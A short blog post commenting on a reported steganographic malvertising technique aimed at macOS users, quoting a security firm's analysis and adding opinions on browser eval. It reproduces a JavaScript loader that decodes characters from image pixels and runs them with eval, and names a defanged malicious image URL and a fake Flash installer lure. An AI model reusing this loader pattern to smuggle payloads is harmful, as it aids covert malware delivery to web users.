I’d been meaning to talk about the stenographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack to recreate the sorts of exploit you saw all over the place five years ago pop back up briefly.”

That is, all it does is hide some code that can would’ve been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised.

Let’s hit the high points from the security blog post:

Here’s how the exploit operates:

  • Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.)
  • Grab the image located at: hxxp://s.ad-pixel.com/sscc.jpg
  • Define a function that checks if a specific font family is supported in the browser.
  • Check if Apple fonts are supported. If not, then do nothing.
  • If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character.
  • Add the newly extracted character to a string.
  • Execute the code in the string.

...

All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso

And here’s the secret code in action that reads from the image and pushes it into an eval:

image['onload'] = function () {
    ctx['drawImage'](image, 0x0, 0x0);
    var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
    for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
        rs += String['fromCharCode'](o['data'][p + 0x2]);
    }
    eval(rs);
};

That should do it for you. It treats the image as a data stream, decodes some characters, and evals them. Well, duh.

Question: Why do browsers still allow eval?

(Okay, there’s probably something where on-demand loading with require, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls eval, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.)

As the blog author says…

Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure.

Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue.

This is a natural progression. Not really much to see or learn here past that.

Labels: , , ,